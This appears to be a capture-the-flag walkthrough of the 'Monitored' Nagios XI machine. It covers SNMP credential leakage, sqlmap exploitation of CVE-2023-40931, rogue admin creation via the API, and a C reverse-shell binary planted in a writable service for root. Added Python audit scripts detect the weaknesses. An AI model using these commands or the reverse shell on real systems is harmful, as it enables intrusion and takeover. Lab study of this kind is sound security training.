Monitored - Walkthrough
Monitored is a medium-difficulty Linux machine that features a Nagios instance. Credentials for the service are obtained via the SNMP protocol, which reveals a username and password combination passed as command-line parameters to a running process. Using the Nagios API, an authentication token for a disabled account is obtained, which leads to access to the application's dashboard. From there, a SQL injection (CVE-2023-40931) is abused to obtain an administrator API key, with which a new admin account is created and used to run arbitrary commands on the instance, leading to a reverse shell. Finally, sudo access to a bash script is abused to read the root user's SSH key and authenticate as root.
Reconnaissance
We begin with an Nmap scan to identify open services:
```bash
sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping 10.10.11.248 -oG allPorts
```

The scan reveals:
| PORT | STATE | SERVICE |
|---|---|---|
| 22/tcp | open | ssh |
| 80/tcp | open | http |
| 389/tcp | open | ldap |
| 443/tcp | open | https |
| 5667/tcp | open | unknown |
A targeted scan provides more details:
```bash
sudo nmap -p22,80,389,443,5667 -sCV 10.10.11.248 -oN targeted
```

- SSH → OpenSSH 8.4p1 Debian 5+deb11u3
- HTTP → Apache 2.4.56, redirecting to https://nagios.monitored.htb/
- HTTPS → Nagios XI
- LDAP → OpenLDAP 2.2.X - 2.3.X
We add the hostname to /etc/hosts:
```bash
sudo sh -c 'echo "10.10.11.248 nagios.monitored.htb" >> /etc/hosts'
```
A UDP scan reveals SNMP:
```bash
sudo nmap -p- -sUCV --min-rate 5000 -vvv -n -Pn --disable-arp-ping 10.10.11.248 -oG allPortsUdp
```

- 161/udp → SNMPv1 server
Enumeration
We query SNMP for information:
```bash
snmpbulkwalk -v 2c -c public -O a nagios.monitored.htb >> snmpwalk.txt
```

The output reveals credentials in the command-line arguments of a running process (hrSWRunParameters):
```
iso.3.6.1.2.1.25.4.2.1.5.1417 = STRING: "-c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB"
```

| Username | Password |
|---|---|
| svc | XjH7VCehowpR1xZB |
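The exposure above is a process that receives its password as an argument, which the HOST-RESOURCES-MIB then hands to anyone who can read the SNMP community. The following is an added example (not part of the original walkthrough) that a defender can run against their own snmpwalk output to find such rows; the sample output, the regular expressions and the credential heuristics are constructed for this page.

```python
"""Audit snmpwalk output for process command lines that expose secrets.

Parses hrSWRunParameters rows (HOST-RESOURCES-MIB, OID 1.3.6.1.2.1.25.4.2.1.5)
from snmpwalk/snmpbulkwalk text output and flags argument strings that look
like they carry a credential. Added example; heuristics are our own.
"""
import re

# Numeric OID prefix of hrSWRunParameters; snmpwalk may print the root as
# "iso", ".1" or "1" depending on output options.
HR_SW_RUN_PARAMS = re.compile(
    r'^(?:iso|\.?1)\.3\.6\.1\.2\.1\.25\.4\.2\.1\.5\.(\d+)\s*=\s*STRING:\s*"(.*)"\s*$'
)

# Two constructed heuristics: an explicit password flag, or a long token that
# mixes upper case, lower case and digits (the svc password above is 16 chars).
PASSWORD_FLAG = re.compile(r'(?:^|\s)(?:-p|--password(?:=|\s))', re.I)
HIGH_ENTROPY = re.compile(r'(?=.*[a-z])(?=.*[A-Z])(?=.*\d)[A-Za-z0-9]{12,}')


def find_exposed_credentials(snmp_text):
    """Return [(pid, params)] for hrSWRunParameters rows that look sensitive."""
    hits = []
    for line in snmp_text.splitlines():
        m = HR_SW_RUN_PARAMS.match(line.strip())
        if not m:
            continue  # not an hrSWRunParameters row (e.g. hrSWRunName, .4)
        pid, params = int(m.group(1)), m.group(2)
        if PASSWORD_FLAG.search(params) or HIGH_ENTROPY.search(params):
            hits.append((pid, params))
    return hits


# Constructed sample walk; the first row mirrors the finding on this page.
SAMPLE_WALK = """\
iso.3.6.1.2.1.25.4.2.1.5.1417 = STRING: "-c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB"
iso.3.6.1.2.1.25.4.2.1.5.612 = STRING: "-D FOREGROUND"
iso.3.6.1.2.1.25.4.2.1.5.901 = STRING: "--password=hunter2 -h db.internal"
iso.3.6.1.2.1.25.4.2.1.4.1417 = STRING: "bash"
"""

if __name__ == "__main__":
    for pid, params in find_exposed_credentials(SAMPLE_WALK):
        print(f"pid {pid}: {params}")
```

Fixing the finding means moving the secret out of argv (a config file readable only by the service user, or an environment file) and restricting the SNMP community to read-only from management hosts.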
Using the Nagios API, we authenticate and obtain a token:
```bash
curl -sikX 'POST' -H 'Content-Type: application/x-www-form-urlencoded' --data-binary 'username=svc&password=XjH7VCehowpR1xZB' 'https://nagios.monitored.htb/nagiosxi/api/v1/authenticate'
```

The response includes a valid auth token:
```json
{
  "username": "svc",
  "user_id": "2",
  "auth_token": "2e52f0f988b54ef4b63f6a46a5a1275f5efa8a0b",
  "valid_min": 5,
  "valid_until": "Sat, 06 Apr 2024 05:38:50 -0400"
}
```

We can now access the Nagios XI dashboard:
```
https://nagios.monitored.htb/nagiosxi/login.php?token=2e52f0f988b54ef4b63f6a46a5a1275f5efa8a0b
```
Exploitation
We identify a SQL injection vulnerability (CVE-2023-40931) in the banner message endpoint:
```bash
sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3" --batch -p id --cookie="nagiosxi=dp2nabacj7kq9l359uj4ledbho" --dbms=mysql --threads=10
```

We extract user credentials from the database:
```bash
sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3" --batch -p id --cookie="nagiosxi=dp2nabacj7kq9l359uj4ledbho" --dbms=mysql --threads=10 -D nagiosxi -T xi_users --dump
```

| Username | API Key |
|---|---|
| nagiosadmin | IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL |
| svc | 2huuT2u2QIPqFuJHnkPEEuibGJaJIcHCFDpDb29qSFVlbdO4HJkjfg2VpDNE3PEK |
Using the admin API key, we create a new admin user:
```bash
curl -sikX POST "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL" -H 'Content-Type: application/x-www-form-urlencoded' --data-binary 'username=johndoe&[email protected]&name=JohnDoe&password=12345&auth_level=admin'
```

We can now execute commands through the Nagios command execution feature. We set up a listener and execute a reverse shell:
```bash
nc -lvnp 5000
```

We obtain a shell as the nagios user and capture the user flag:
```bash
cat user.txt
```

User flag: 0d8bb94199fb26a55d80ac440f77554d
Privilege Escalation
We check sudo privileges:
```bash
sudo -l
```

The user can run several scripts as root, including /usr/local/nagiosxi/scripts/manage_services.sh.
Using linpeas, we identify writable Nagios binaries:
```
/etc/systemd/system/multi-user.target.wants/nagios.service is calling this writable executable: /usr/local/nagios/bin/nagios
```

Because the service binary is writable by the nagios user and the sudo-allowed script can restart the service, we replace the nagios binary with a reverse shell:
```c
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(void) {
    int port = 6000;                 /* listener port from the walkthrough */
    struct sockaddr_in revsockaddr;

    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    revsockaddr.sin_family = AF_INET;
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("10.10.14.12"); /* attacker host */

    connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr));

    /* Point stdin/stdout/stderr at the socket, then hand over to bash. */
    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    char * const argv[] = {"bash", NULL};
    execvp("bash", argv);
    return 0;
}
```

We compile it in place of the original binary and restart the service through the sudo-allowed script:

```bash
nagios@monitored:/usr/local/nagios/bin$ gcc -o nagios nagios.c
nagios@monitored:/usr/local/nagios/bin$ chmod +x nagios
nagios@monitored:/usr/local/nagios/bin$ sudo /usr/local/nagiosxi/scripts/manage_services.sh restart nagios
```

We catch the root shell:
```bash
nc -lvnp 6000
cat /root/root.txt
```

Root flag: f372d917122ffefda9fb77c779fe2117
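The root cause of the escalation above is a systemd unit whose ExecStart binary is writable by a non-root user, combined with a sudo rule that restarts the service. As an added example (not part of the original walkthrough, and not what linpeas itself runs), the following check walks a directory of unit files and reports Exec* targets with weak permissions; the unit files and binaries it inspects are constructed in a temporary directory, and the `trusted_uid` parameter is our own addition so the demo works without root.

```python
"""Flag systemd services whose Exec* binary is writable by non-root.

Added example. A real audit would also walk /etc/systemd/system and
/lib/systemd/system and check parent directories for write access.
"""
import os
import re
import stat
import tempfile

# ExecStart=/path args, allowing systemd's "-", "@", "+", "!" and ":" prefixes.
EXEC_RE = re.compile(r'^Exec(?:Start|StartPre|StartPost|Reload|Stop)=[-@+!:]*(\S+)')


def weak_permissions(st, trusted_uid=0):
    """True if group/other may write, or the owner is not the trusted uid."""
    group_or_other_write = bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))
    return group_or_other_write or st.st_uid != trusted_uid


def find_writable_exec_targets(unit_dir, trusted_uid=0):
    """Return [(unit_name, exec_path)] for units whose Exec* binary is weak."""
    findings = []
    for name in sorted(os.listdir(unit_dir)):
        if not name.endswith(".service"):
            continue
        with open(os.path.join(unit_dir, name)) as fh:
            for line in fh:
                m = EXEC_RE.match(line.strip())
                if m and os.path.isfile(m.group(1)):
                    if weak_permissions(os.stat(m.group(1)), trusted_uid):
                        findings.append((name, m.group(1)))
    return findings


def run_demo():
    """Build two constructed units in a temp dir; return the flagged unit names."""
    with tempfile.TemporaryDirectory() as tmp:
        units = os.path.join(tmp, "system")
        os.makedirs(units)
        # good.service points at a 0755 binary; nagios.service at a 0777 one,
        # mirroring the writable /usr/local/nagios/bin/nagios found above.
        for unit, mode in (("good.service", 0o755), ("nagios.service", 0o777)):
            binary = os.path.join(tmp, unit.replace(".service", "-bin"))
            with open(binary, "w") as fh:
                fh.write("#!/bin/sh\n")
            os.chmod(binary, mode)
            with open(os.path.join(units, unit), "w") as fh:
                fh.write(f"[Service]\nExecStart={binary} -d /etc/conf\n")
        return [u for u, _ in find_writable_exec_targets(units, os.getuid())]


if __name__ == "__main__":
    print(run_demo())
```

On a real host, the fix is to make service binaries root-owned and mode 0755, and to keep the service account (here nagios) out of the write ACL for anything systemd executes as root.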